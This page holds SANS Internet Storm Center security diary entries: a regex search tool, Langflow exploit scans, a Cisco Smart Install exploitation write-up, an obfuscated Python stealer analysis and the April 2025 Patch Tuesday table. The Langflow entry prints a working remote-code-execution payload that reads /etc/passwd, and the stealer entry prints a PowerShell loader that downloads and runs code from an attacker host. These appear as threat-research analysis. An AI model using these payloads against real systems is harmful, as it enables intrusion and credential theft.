Diaries

Published: 2025-04-14

xorsearch.py: Searching With Regexes

As promised in diary entry "XORsearch: Searching With Regexes", I will outline another method to search with xorsearch and regexes.

In stead of XORsearch.exe, the original tool that is written in C and compiled, we will use xorsearch.py, a new tool written in Python.

Unlike XORsearch.exe, xorsearch.py supports YARA rules, and thus regex searches.

Let's say we want to use this trivial regular expression to match IPv4 addresses (it's matching 4 numbers separated by dots): \d+\.\d+\.\d+\.\d+

We can create a YARA rule for this regex:

And then we can use this rule on a test file (test-xor-1.bin):

This tells us that YARA rule ipv4 (namespace ipv4.yara) triggered on file test-xor-1.bin when it is XOR encoded with key 0x19.

To see the YARA rule strings that were matched, use option --yarastrings:

To see the encoded file, use one of the many dump options, like -a for a HEX/ASCII dump:

Or a binary dump with option -d:

If you find it cumbersome to create a YARA rule just for a simple regex (I find it cumbersome :-) ), you can pass the regex via the command line prefixed with #r#, and xorsearch.py will generate the YARA rule for you:

I will give more examples of this in an upcoming diary entry.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

 

0 Comments

Published: 2025-04-12

Exploit Attempts for Recent Langflow AI Vulnerability (CVE-2025-3248)

Two weeks ago, version 1.3.0 of Langflow was released. The release notes list many fixes but do not mention that one of the "Bug Fixes" addresses a major vulnerability. Instead, the release notes state, "auth current user on code validation." [1]

Its website states, "Langflow is a low-code tool for developers that makes it easier to build powerful AI agents and workflows that can use any API, model, or database." It can be installed as a Python package, a standalone desktop application, or as a cloud-hosted service. DataStax provides a ready-built cloud-hosted environment for Langflow.

The vulnerability went somewhat unnoticed, at least by me, until Horizon3 created a detailed writeup showing how easy it is to exploit the vulnerability and provide proof of concept exploit. Horizon3 published its blog on April 9th [2]. We saw a first hit to the vulnerable URL, "/api/v1/validate/code", on April 10th. Today (April 12th), we saw a significant increase in hits for this URL.

The requests we are seeing are vulnerability scans. They attempt to retrieve the content of "/etc/passwd" to verify if the target system:

POST /api/v1/validate/code HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4
Connection: close
Content-Length: 125
Content-Type: application/json
Accept-Encoding: gzip

 

{"code": "@exec('raise Exception(__import__(\\"subprocess\\").check_output([\\"cat\\", \\"/etc/passwd\\"]))')\\ndef foo():\\n  pass"}
 

Not all of our honeypots report request bodies. So far, this is the only request body we recorded. So far, all of the requests originate from TOR exit nodes.

 

[1] https://github.com/langflow-ai/langflow/releases/tag/1.3.0
[2] https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments

Published: 2025-04-09

Network Infraxploit [Guest Diary]

[This is a Guest Diary by Matthew Gorman, an ISC intern as part of the SANS.edu BACS program]

Background

I recently had the opportunity to get hands on with some Cisco networking devices. Due to being a network engineer prior to my current job as a network forensics analyst, I have a relatively solid understanding of these infrastructure devices and how they work. I wanted to write this blog detailing some of the critical oversights I see in my current job that are common for these devices and how they are abused by attackers that are also familiar with how they work. To demonstrate this I will be walking through a vulnerability that was first discovered in 2018 for these network Infrastructure devices, CVE-2018-0171, a Remote Code Execution exploit targeting Cisco’s Smart Install feature. 

CVE-2018-0171

Cisco’s Smart Install feature is a “plug and play”[1] configuration feature that allows for new networking devices to be deployed remotely and when plugged in they will configure themselves automatically without needing the support of a network administrator. This greatly eases the burden of network administrators needing to go on site where the device is to make the basic initial configuration changes to ensure it is remotely accessible. 

The problem with smart install is three pronged. First, this feature is enabled by default on Cisco devices.[2] The second is that, by design, Smart Install protocol does not require authentication prior to use. The third, and last, prong is that due to the nature of the devices facilitating the flow of network traffic in and out of organizations, the port is often publicly accessible. In fact, doing a cursory search on Censys for this port and the service name associated with Cisco Smart Install (SMI) pulled up 1,239 devices with this service publicly accessible.

To be clear, this is not to say that all 1,239 of these devices are vulnerable to this particular CVE. This is simply illustrating the prevalence of publicly accessible devices running the Smart Install service.

So in 2018 when Cisco publishes a critical vulnerability with remote code execution capabilities that impacts a service that is designed to be open to the internet it becomes a popular exploit fast. The flaw in the smart install service allows an attacker to craft a packet with a Smart Install message that would be improperly validated, allowing the supplied command to be run without authentication.

In an effort to develop additional analytical insights into this attack I was able to get hands on with some outdated Cisco devices and pull an open source tool that targets this vulnerability called the Smart Install Exploit Tool (SIET)[3].

SIET Script Analysis

For this use case, I used a Cisco Catalyst 3750 switch running on IOS 12.2.(55) SE11 firmware. Using the Cisco Software Checker tool,[4] I identified that this version of IOS had 32 different identified vulnerabilities to include 3 that were rated as “Critical”. One of those “Critical” vulnerabilities included CVE-2018-0171. Upon confirming the switch was vulnerable to CVE-2018-0171, I downloaded the SIET tool from GitHub to examine how it works. Looking at the python script that the Smart Install Exploit Tool (v3) is built on; SIET has several functions that exist to perform different actions towards the targeted device. These functions include:

conn_with_client
This sets a connection with the remote cisco device and prints different messages depending on the response from the targeted device.

test_device
This creates a malicious Smart Install packet and calls the conn_with_client function to send it to the remote device.

change_tftp
This function calls the conn_with_client function to connect to the targeted cisco device and depending on the set mode the Threat Actor (TA) selects performs different actions. The specified modes allow the actor to upload their own altered configuration file to replace the existing configuration file on the targeted device (or multiple devices, if specified), use TFTP to transfer the existing configuration file to the TA’s IP address, or have the targeted device download a potentially malicious or trojanized Cisco IOS image file from the TA’s IP address. 

Summarily, this exploit tool provides a significant amount of capability to a Threat Actor seeking to gain access to an unpatched Cisco networking device hosting the Smart Install service.

Packet Analysis

After setting up the connection from my laptop to the Cisco 3750 switch. I configured the switch to turn on the Smart Install service by issuing the command “vstack”. This is configured by default but, in this case, had been turned off during previous testing. Issuing this command starts up a TCP listener on port 4786 that smart install uses to respond to Smart Install Director Requests. Smart Install Directors are a role in the Cisco Smart Install architecture that acts as a central management hub for all Smart Install enabled clients, in this case it is the Cisco 3750 switch.

Once the switch was configured, I fired up SIETv3 and ran the script with the flag “-h” to pull up the help menu. 

As seen above this tool has several options that can be run against vulnerable Cisco networking devices. The one I used in this scenario was the “-g” flag to pull back the configuration of the device. Prior to running the command I started wireshark to make sure I captured the attack on a packet level. 

After running the attack and successfully pulling back the configuration of the Cisco 3750 I stopped the packet capture. Below is a snippet from the packet capture that shows the structure of the attack from a high level. 

Generally, the attack, as I had specified, follows a pattern of connecting to the Smart Install port (4786) and then using the Trivial File Transfer Protocol to then grab the contents of the running configuration of the Cisco switch. 

Interestingly examining the TCP packets that are communicating on port 4786 There is a single packet that is much larger in length than the others. In this packet capture it is packet 43 with a length of 1102 bytes. 

Examining the data portion of this packet reveals some interesting commands being issued from my laptop to the 3750. Specifically, my laptop is using the Smart Install port to first issue the command “copy system:running-config flash:/config.txt”. This command takes the running configuration file that exists in the system directory and copies it over to the flash directory with the name “config.text”. SIET then follows up this command with another one that says “copy flash:/config.text. tftp://192.168.10.2/192.168.10.1.conf” this command takes the newly copied over config.text file and, using the TFTP protocol, copies it to my laptop with the new name of “192.168.10.1.conf”. 

After these two commands the TFTP file transfer begins and because TFTP is a clear text protocol it is possible to see the entire running configuration of the 3750 in the data portion of the TFTP packets. Below is the data portion of packet 66 which shows a portion of the configuration in clear text

Running-Configuration Analysis

Examining the file that is being transferred just in the data portion of these TFTP packets in wireshark makes it a little hard to parse. Luckily, Wireshark includes a file carving tool that will compile the entire file that was transferred and while making it easier to parse.

To do so, I used the TFTP option under “File -> Export Objects -> TFTP…”. This pulls up the below window that displays the last packet of the file transfer, the size of the transfer, and the name of the file as named in the second command issued in packet 43. 

From here I saved off the file and pulled it up in a text editor to examine the whole running configuration file that was transferred. Below is a screenshot of the first several lines of the running configuration. A quick note, I did edit the text file to censor the passwords used on this device (denoted by “<CENSORED>”) for privacy and security reasons. 

With this information, in a Threat Actors (TA) hand, they could examine the running configuration to probe for additional vulnerabilities they could use to further exploit. For example, in this case I have several Type 7 passwords configured on this switch, which are denoted by the “password 7”. Type 7 passwords are passwords that have been encrypted using a Vignere cipher. Unfortunately, the key for this cipher has been public for many years and as a result, there are several websites, github tools, and tools embedded into offensive platforms such as Kali Linux, that can crack these passwords immediately. Due to this, the NSA strongly recommends against using type 7 passwords in any form[5]. 

The 3750, however, does have type 7 passwords configured for the local accounts with admin privileges (admin accounts are distinguished via “privilege 15”, the highest privilege level on a Cisco device) on the device and with the unedited version of this running configuration a TA would easily be able to crack the passwords for these accounts. Should the SSH configurations for this device be equally unsecure, lacking an Access Control List for example, a Threat Actor could be able to login with the newly cracked credentials using a legitimate account that was provisioned for use by the owners of the device. This would limit the detectable footprint of a TA’s activity by not forcing them to make a new account on the device that may stand out if an organization is closely monitoring account creation on network devices in their environment.

Conclusion

It is an unfortunate reality that while this particular vulnerability may be the age of the average American second grader[6] (reaching 7 years old by March 28, 2025), this vulnerability is still actively being exploited with incredible degrees of success. GreyNoise, a cyber threat intelligence company, and Cisco Talos, Cisco’s threat intelligence arm, have both published blog posts on the active use of CVE-2018-0171 by the TA known as Salt Typhoon.[7][8] Salt Typhoon is an Advanced Persistent Threat (APT) actor based out of the People’s Republic of China and was recently reported to be behind a campaign of attacks that gained media attention in the fall of 2024. These attacks, described by one U.S. Senator as the, “worst telecom hack in our nation’s history”,  were against several major US-based Internet Service Providers that operate globally to include companies such as Verizon, AT&T, and T-Mobile.[9] While the impact of these hacks is still being understood today, what we do know is that there are significant security gaps when it comes to the monitoring and management of the network infrastructure devices that stitch together the internet. These devices will continue to be a lucrative target for APTs, Cybercriminals, and others that wish to get a foothold in critical infrastructure. Unless organizations begin prioritizing the hardening and visibility of the network infrastructure, vulnerabilities like CVE-2018-0171 will remain open doors for adversaries.  

[1] https://www.cisco.com/c/en/us/td/docs/switches/lan/smart_install/configuration/guide/smart_install/concepts.html
[2] https://www.nsa.gov/portals/75/documents/what-we-do/cybersecurity/professional-resources/orn-cisco-smart-install.pdf
[3] https://github.com/frostbits-security/SIET
[4]  https://sec.cloudapps.cisco.com/security/center/softwarechecker.x
[5] https://media.defense.gov/2022/Feb/17/2002940795/-1/-1/1/CSI_CISCO_PASSWORD_TYPES_BEST_PRACTICES_20220217.PDF
[6] https://www.cde.state.co.us/datapipeline/grade-age-chart
[7] https://www.greynoise.io/blog/greynoise-observes-active-exploitation-of-cisco-vulnerabilities-tied-to-salt-typhoon-attacks
[8] https://blog.talosintelligence.com/salt-typhoon-analysis/
[9] https://www.washingtonpost.com/national-security/2024/11/21/salt-typhoon-china-hack-telecom/
[10] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

0 Comments

Published: 2025-04-09

Obfuscated Malicious Python Scripts with PyArmor

Obfuscation is very important for many developers. They may protect their code for multiple reasons like copyright, anti-cheat (games), or to protect their code from being reused. If an obfuscated program does not mean automatically that it is malicious, it’s often a good sign. For malware developers, obfuscation helps bypass many static security controls and slows down the reverse analysis process.

There are two main ways to obfuscate your code: directly at development time (strings obfuscation, code pollution, functions and variables names, …) or through another tool that will take the original program as input and generate a brand new one.

Yesterday, I spotted some malicious Python scripts that were protected using the same technique: PyArmor[1]. This tool is not coming from the underground and is an official tool to deeply obfuscate Python scripts, and it performs a pretty decent job!

Let’s have a look at one of them delivered through a piece of JavaScript: update.js (SHA256: 64bcf9eb0a54230372438a09ba0ac9e5fa753622e88713d80b9298ab219540fa[2]). The script is a one-liner:

var WshShell = new ActiveXObject("Wscript.Shell");
WshShell.run("Powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded WwBTAHkAcwB0AGUA ...[Redacted] ... 8ACAAaQBlAHgA", 0, false);

The decoded Base64 data reveals another one:

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"JFVSTCA9ICdo ... [Redacted] ... 2NyaXB0UGF0aCINCg=="}' | ConvertFrom-Json).Script)) | iex

Did you see that the next payload is stored in a JSON object?  Here is the decoded script:

$URL = 'hxxps://postprocesser[.]com/.well-known/pki-validation/go/python3.zip'
$OutFile = Join-Path $env:TEMP 'py.zip'
$ExtractPath = $env:TEMP
$pythonExe = 'pythonw.exe'
$scriptPy = 'exec.py'

$ProgressPreference = 'SilentlyContinue'
Invoke-WebRequest -Uri $URL -OutFile $OutFile

if (Test-Path -Path (Join-Path $ExtractPath 'python3')) {
    Remove-Item -Path (Join-Path $ExtractPath 'python3') -Recurse -Force
}

Add-Type -AssemblyName System.IO.Compression.FileSystem
[System.IO.Compression.ZipFile]::ExtractToDirectory($OutFile, $ExtractPath)

$pythonPath = Join-Path (Join-Path $ExtractPath 'python3') $pythonExe
$scriptPath = Join-Path (Join-Path $ExtractPath 'python3') $scriptPy

Start-Process -NoNewWindow -FilePath "cmd.exe" -ArgumentList "/c set REALTEKAUDIO=hxxps://postprocesser[.]com/.well-known/pki-validation/go/cinnamonroll.php?id=mumu && set PROCNAME=Main && $pythonPath $scriptPath"

The downloaded archive python3.zip contains a stand-alone Python environment and also the next payload (exec.py):

# Pyarmor 8.5.11 (pro), 005724, non-profits, 2024-12-13T07:33:37.517122
from pyarmor_runtime_005724 import __pyarmor__
__pyarmor__(__name__, __file__, b'PY005724\x00\x03\x0b\x00\xa7\r\r\n\x80 ... [Redacted] ... \xff\xe3m\x82\xdboi,\x85i\xf0')

If you execute this code in a sandbox, it will perform many suspicious actions:

wmic path win32_VideoController get name
wmic csproduct get UUID
taskkill /F /IM msedge.exe
taskkill /F /IM chrome.exe

Then crash…

How to get more details about this Python script? PyArmor can’t be deobuscated easily (especially the latest version). Let’s try to extract some piece of memory. As described in the PyArmor documentation[3], it serializes code objects and obfuscates them to protect constants and literal strings. Python marshal[4] is used for this.

Using Frida[5], let’s try to get access to some memory regions. We can hook PyMarshal_ReadObjectFromString() and dump data on disk. Here is a quick Frida script:

const marshalLoads = Module.findExportByName(null, "PyMarshal_ReadObjectFromString");
if (marshalLoads !== null) {
    console.log("Found marshal.loads at: " + marshalLoads);
    Interceptor.attach(marshalLoads, {
        onEnter: function (args) {
            this.buf = args[0];
            this.len = args[1].toInt32();
        },
        onLeave: function (retval) {
            const raw = Memory.readByteArray(this.buf, this.len);
            const filename = `marshal_dump_${Date.now()}.pyc`;
            const f = new File(filename, "wb");
            f.write(raw);
            f.close();
            console.log("[+] Dumped marshal.loads payload to: " + filename);
        }
    });
} else {
    console.log("marshal.loads not found.");
}

Let’s execute the script again through Frida:

 

C:\Users\REM\AppData\Local\Temp\python3>frida -l .\hook.js -f .\python.exe exec.py
     ____
    / _  |   Frida 16.7.4 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to Local System (id=local)
Spawning `.\python.exe exec.py`...
Found marshal.loads at: 0x7ffbceb68fc8
Spawned `.\python.exe exec.py`. Resuming main thread!
[+] Dumped marshal.loads payload to: marshal_dump_1744177893798.pyc
...

We had a hit on the hooked function! The result file is not a Python bytecode as expected but just data without relevant strings (only related to the Python environment).

Another approach is to dump the process completely then search for strings again (because once in memory, it has been deobfuscated).

Interesting strings are present in memory and reveal a classic Python script:

esurroundtogethertomorrowtortoisetransferumbrellauniverseDwmFlushAbortDocDeleteDCMoveToExResetDCWoleaut32SetFocusCopyRectPtInRectDrawIconFillRectEndPaintClassANYQuestiondaylightSHA1-RSADSA-SHA1DNS nameavx512cdavx512eravx512pfavx512dq2.5.4.102.5.4.112.5.4.17FakeErrorfork/execcontinuedRemoveAll#execwaitinterruptbus errorntdll.dllFindCloseLocalFreeMoveFileWWriteFileWSASendTowiresharkprl_toolsprocmon64exeinfopeproxifierhttpdebugmitmproxytitanhideSERVER-PCLOUISE-PCBECKER-PCkEecfMwgjralphs-pcGANGISTANRALPHS-PCj6SHA37KAkeecfmwgjQmIS5df7upWOuqdTDQUox1tzaMOrB5BnfuR2txWas1m2ta.monaldoUser DataMicrosoft%s//UsersPasswordsDownloadsAutofillsBitFinityDoge LabsLiqualityMaiarDEFI\bytecoinnot foundopera.exebrave.exeDCBrowserSeaMonkeyIceDragonPale MoonUrBrowsermotdepassDocumentsTLauncheralts.jsonalts.novoLightcord

You can see some search sandbox names (“SERVER”, “PC-LOUISE”, …) as well as process names (“procmon64”, “execinfope”, …)

Another interesting one:

failed to write to key log

Credit cards and wallet activity:

Credit Cards: %-50s %-50s %-50s\Electrum\walletsbrowser not foundEpicGamesLauncher

It seems to be a classic stealer...

If you have tools or processes to deobfuscate PyArmor-protected script, please share!

[1] https://github.com/dashingsoft/pyarmor
[2] https://www.virustotal.com/gui/file/64bcf9eb0a54230372438a09ba0ac9e5fa753622e88713d80b9298ab219540fa/details
[3] https://pyarmor.readthedocs.io/en/v7.3.3/how-to-do.html
[4] https://docs.python.org/3/library/marshal.html
[5] https://frida.re

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 Comments

Published: 2025-04-08

Microsoft April 2025 Patch Tuesday

This month, Microsoft has released patches addressing a total of 125 vulnerabilities. Among these, 11 are classified as critical, highlighting the potential for significant impact if exploited. Notably, one vulnerability is currently being exploited in the wild, underscoring the importance of timely updates. While no vulnerabilities were disclosed prior to this patch release, the comprehensive updates aim to fortify systems against a range of threats, including remote code execution and privilege escalation. Users are encouraged to apply these patches promptly to enhance their security posture.

Windows Common Log File System Driver Elevation of Privilege Vulnerability (CVE-2025-29824)
This is a zero-day vulnerability with a severity rating of Important and a CVSS score of 7.8, which is currently being exploited in the wild but has not been publicly disclosed. This vulnerability allows an attacker to elevate their privileges to SYSTEM level, posing a significant risk to affected systems. It specifically impacts Windows 10 for both x64-based and 32-bit systems. However, security updates to address this vulnerability are not yet available, and Microsoft plans to release them as soon as possible. Customers will be notified through a revision to the CVE information once the updates are ready.

Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2025-26663)
This critical vulnerability, CVE-2025-26663, has not been exploited in the wild nor disclosed publicly, making it a non-zero-day threat. It carries a CVSS score of 8.1, indicating a significant risk due to its potential impact of remote code execution. The vulnerability arises from a race condition that an unauthenticated attacker could exploit by sending specially crafted requests to a vulnerable LDAP server, leading to a use-after-free scenario. Although the attack complexity is high, requiring the attacker to win a race condition, the severity of the potential impact underscores the critical nature of this vulnerability. Currently, security updates for Windows 10 systems are not immediately available, but they will be released as soon as possible, with notifications provided via a revision to the CVE information.

Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability (CVE-2025-26670)
This critical vulnerability, identified as CVE-2025-26670, has not been exploited in the wild nor disclosed publicly. It carries a CVSS score of 8.1, indicating a significant risk of remote code execution. The vulnerability arises from a race condition that can be exploited by an unauthenticated attacker sending specially crafted requests to a vulnerable LDAP server, potentially resulting in a use-after-free condition. This could be leveraged to execute arbitrary code remotely. Despite the high attack complexity (AC:H), the potential impact is severe. Currently, security updates for Windows 10 systems are not available, but Microsoft plans to release them as soon as possible, with notifications provided through a revision to the CVE information.

Windows Remote Desktop Services Remote Code Execution Vulnerability (CVE-2025-27480)
This is a critical vulnerability with a CVSS score of 8.1, which has not been exploited in the wild nor publicly disclosed as a zero-day. This vulnerability allows for remote code execution by an attacker who connects to a system with the Remote Desktop Gateway role. The attack involves triggering a race condition to create a use-after-free scenario, which can then be leveraged to execute arbitrary code. Despite its critical severity, the attack complexity is high, requiring the attacker to successfully win a race condition to exploit the vulnerability.

Windows Remote Desktop Services Remote Code Execution Vulnerability (CVE-2025-27482)
This is a critical vulnerability with a CVSS score of 8.1, which has not been exploited in the wild nor disclosed publicly, making it a potential zero-day threat. This vulnerability allows for remote code execution, posing a significant risk to systems with the Remote Desktop Gateway role. Exploitation requires an attacker to successfully navigate a high-complexity attack scenario, specifically by winning a race condition that leads to a use-after-free situation, ultimately enabling the execution of arbitrary code. Organizations are advised to implement robust security measures and monitor for any suspicious activities to mitigate potential risks associated with this vulnerability.

This summary highlights key vulnerabilities from Microsoft's monthly updates, focusing on those posing significant risks. The Windows Common Log File System Driver vulnerability (CVE-2025-29824) is a zero-day threat actively exploited, allowing attackers to gain SYSTEM-level privileges. Users should prioritize monitoring and applying updates once available. Other critical vulnerabilities, such as those affecting LDAP and Remote Desktop Services, involve complex attack scenarios but pose severe risks due to potential remote code execution. Microsoft Office and Excel vulnerabilities also present significant threats, often requiring user interaction through social engineering tactics. Users are advised to remain vigilant and apply security updates promptly upon release to mitigate these risks.

 

Description
CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
ASP.NET Core and Visual Studio Denial of Service Vulnerability
%%cve:2025-26682%% No No - - Important 7.5 6.5
Active Directory Certificate Services Elevation of Privilege Vulnerability
%%cve:2025-27740%% No No - - Important 8.8 7.7
Active Directory Domain Services Elevation of Privilege Vulnerability
%%cve:2025-29810%% No No - - Important 7.5 6.5
Azure Local Cluster Information Disclosure Vulnerability
%%cve:2025-25002%% No No - - Important 6.8 5.9
%%cve:2025-26628%% No No - - Important 7.3 6.4
Azure Local Elevation of Privilege Vulnerability
%%cve:2025-27489%% No No - - Important 7.8 6.8
BitLocker Security Feature Bypass Vulnerability
%%cve:2025-26637%% No No - - Important 6.8 5.9
DirectX Graphics Kernel Elevation of Privilege Vulnerability
%%cve:2025-29812%% No No - - Important 7.8 6.8
HTTP.sys Denial of Service Vulnerability
%%cve:2025-27473%% No No - - Important 7.5 6.5
Kerberos Key Distribution Proxy Service Denial of Service Vulnerability
%%cve:2025-27479%% No No - - Important 7.5 6.5
Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability
%%cve:2025-26670%% No No - - Critical 8.1 7.1
Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability
%%cve:2025-29800%% No No - - Important 7.8 6.8
%%cve:2025-29801%% No No - - Important 7.8 6.8
Microsoft DWM Core Library Elevation of Privilege Vulnerability
%%cve:2025-24074%% No No - - Important 7.8 6.8
%%cve:2025-24073%% No No - - Important 7.8 6.8
%%cve:2025-24060%% No No - - Important 7.8 6.8
%%cve:2025-24062%% No No - - Important 7.8 6.8
Microsoft Dynamics Business Central Information Disclosure Vulnerability
%%cve:2025-29821%% No No - - Important 5.5 4.8
Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability
%%cve:2025-25000%% No No Less Likely Less Likely Important 8.8 7.7
%%cve:2025-29815%% No No Less Likely Less Likely Important 7.6 6.6
Microsoft Edge for iOS Spoofing Vulnerability
%%cve:2025-29796%% No No Less Likely Less Likely Low 4.7 4.2
%%cve:2025-25001%% No No Less Likely Less Likely Low 4.3 3.8
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2025-27751%% No No - - Important 7.8 6.8
%%cve:2025-27752%% No No - - Critical 7.8 6.8
%%cve:2025-27750%% No No - - Important 7.8 6.8
%%cve:2025-29791%% No No - - Critical 7.8 6.8
%%cve:2025-29823%% No No - - Important 7.8 6.8
Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability
%%cve:2025-26641%% No No - - Important 7.5 6.5
Microsoft Office Elevation of Privilege Vulnerability
%%cve:2025-27744%% No No - - Important 7.8 6.8
%%cve:2025-29792%% No No - - Important 7.3 6.4
Microsoft Office Remote Code Execution Vulnerability
%%cve:2025-27745%% No No - - Critical 7.8 6.8
%%cve:2025-27746%% No No - - Important 7.8 6.8
%%cve:2025-27748%% No No - - Critical 7.8 6.8
%%cve:2025-27749%% No No - - Critical 7.8 6.8
%%cve:2025-26642%% No No - - Important 7.8 6.8
Microsoft OneNote Security Feature Bypass Vulnerability
%%cve:2025-29822%% No No - - Important 7.8 6.8
Microsoft OpenSSH for Windows Elevation of Privilege Vulnerability
%%cve:2025-27731%% No No - - Important 7.8 6.8
Microsoft SharePoint Remote Code Execution Vulnerability
%%cve:2025-29793%% No No - - Important 7.2 6.3
%%cve:2025-29794%% No No - - Important 8.8 7.7
Microsoft Streaming Service Denial of Service Vulnerability
%%cve:2025-27471%% No No - - Important 5.9 5.2
Microsoft System Center Elevation of Privilege Vulnerability
%%cve:2025-27743%% No No - - Important 7.8 6.8
Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability
%%cve:2025-26688%% No No - - Important 7.8 6.8
Microsoft Word Remote Code Execution Vulnerability
%%cve:2025-27747%% No No - - Important 7.8 6.8
%%cve:2025-29820%% No No - - Important 7.8 6.8
Microsoft Word Security Feature Bypass Vulnerability
%%cve:2025-29816%% No No - - Important 7.5 6.5
NTFS Elevation of Privilege Vulnerability
%%cve:2025-27741%% No No - - Important 7.8 6.8
%%cve:2025-27483%% No No - - Important 7.8 6.8
%%cve:2025-27733%% No No - - Important 7.8 6.8
NTFS Information Disclosure Vulnerability
%%cve:2025-27742%% No No - - Important 5.5 4.8
Outlook for Android Information Disclosure Vulnerability
%%cve:2025-29805%% No No - - Important 7.5 6.5
RPC Endpoint Mapper Service Elevation of Privilege Vulnerability
%%cve:2025-26679%% No No - - Important 7.8 6.8
Remote Desktop Client Remote Code Execution Vulnerability
%%cve:2025-27487%% No No - - Important 8.0 7.0
Visual Studio Code Elevation of Privilege Vulnerability
%%cve:2025-20570%% No No - - Important 6.8 5.9
Visual Studio Elevation of Privilege Vulnerability
%%cve:2025-29802%% No No - - Important 7.3 6.4
%%cve:2025-29804%% No No - - Important 7.3 6.4
Visual Studio Tools for Applications and SQL Server Management Studio Elevation of Privilege Vulnerability
%%cve:2025-29803%% No No - - Important 7.3 6.4
Win32k Elevation of Privilege Vulnerability
%%cve:2025-26681%% No No - - Important 6.7 6.0
%%cve:2025-26687%% No No - - Important 7.5 6.5
Windows Admin Center in Azure Portal Information Disclosure Vulnerability
%%cve:2025-29819%% No No - - Important 6.2 5.4
Windows Bluetooth Service Elevation of Privilege Vulnerability
%%cve:2025-27490%% No No - - Important 7.8 6.8
Windows Common Log File System Driver Elevation of Privilege Vulnerability
%%cve:2025-29824%% No Yes - - Important 7.8 7.2
Windows Cryptographic Services Information Disclosure Vulnerability
%%cve:2025-29808%% No No - - Important 5.5 4.8
Windows DWM Core Library Elevation of Privilege Vulnerability
%%cve:2025-24058%% No No - - Important 7.8 6.8
Windows Defender Application Control Security Feature Bypass Vulnerability
%%cve:2025-26678%% No No - - Important 8.4 7.3
Windows Digital Media Elevation of Privilege Vulnerability
%%cve:2025-27476%% No No - - Important 7.8 6.8
%%cve:2025-26640%% No No - - Important 7.0 6.1
%%cve:2025-27467%% No No - - Important 7.8 6.8
%%cve:2025-27730%% No No - - Important 7.8 6.8
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2025-27732%% No No - - Important 7.0 6.1
Windows Hello Security Feature Bypass Vulnerability
%%cve:2025-26635%% No No - - Important 6.5 5.7
Windows Hello Spoofing Vulnerability
%%cve:2025-26644%% No No - - Important 5.1 4.5
Windows Hyper-V Remote Code Execution Vulnerability
%%cve:2025-27491%% No No - - Critical 7.1 6.2
Windows Installer Elevation of Privilege Vulnerability
%%cve:2025-27727%% No No - - Important 7.8 6.8
Windows Kerberos Elevation of Privilege Vulnerability
%%cve:2025-26647%% No No - - Important 8.1 7.1
Windows Kerberos Security Feature Bypass Vulnerability
%%cve:2025-29809%% No No - - Important 7.1 6.5
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2025-26648%% No No - - Important 7.8 6.8
%%cve:2025-27739%% No No - - Important 7.8 6.8
Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
%%cve:2025-27728%% No No - - Important 7.8 6.8
Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability
%%cve:2025-26673%% No No - - Important 7.5 6.5
%%cve:2025-27469%% No No - - Important 7.5 6.5
Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
%%cve:2025-26663%% No No - - Critical 8.1 7.1
Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability
%%cve:2025-27478%% No No - - Important 7.0 6.1
%%cve:2025-21191%% No No - - Important 7.0 6.1
Windows Local Session Manager (LSM) Denial of Service Vulnerability
%%cve:2025-26651%% No No - - Important 6.5 5.7
Windows Mark of the Web Security Feature Bypass Vulnerability
%%cve:2025-27472%% No No - - Important 5.4 4.7
Windows Media Remote Code Execution Vulnerability
%%cve:2025-26666%% No No - - Important 7.8 6.8
%%cve:2025-26674%% No No - - Important 7.8 6.8
Windows Mobile Broadband Driver Elevation of Privilege Vulnerability
%%cve:2025-29811%% No No - - Important 7.8 6.8
Windows NTFS Information Disclosure Vulnerability
%%cve:2025-21197%% No No - - Important 6.5 5.7
Windows Power Dependency Coordinator Information Disclosure Vulnerability
%%cve:2025-27736%% No No - - Important 5.5 4.8
Windows Process Activation Elevation of Privilege Vulnerability
%%cve:2025-21204%% No No - - Important 7.8 6.8
Windows Remote Desktop Services Remote Code Execution Vulnerability
%%cve:2025-26671%% No No - - Important 8.1 7.1
%%cve:2025-27480%% No No - - Critical 8.1 7.1
%%cve:2025-27482%% No No - - Critical 8.1 7.1
Windows Resilient File System (ReFS) Information Disclosure Vulnerability
%%cve:2025-27738%% No No - - Important 6.5 5.7
Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
%%cve:2025-26664%% No No - - Important 6.5 5.7
%%cve:2025-26669%% No No - - Important 8.8 7.7
%%cve:2025-26667%% No No - - Important 6.5 5.7
%%cve:2025-27474%% No No - - Important 6.5 5.7
%%cve:2025-21203%% No No - - Important 6.5 5.7
%%cve:2025-26672%% No No - - Important 6.5 5.7
%%cve:2025-26676%% No No - - Important 6.5 5.7
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2025-26668%% No No - - Important 7.5 6.5
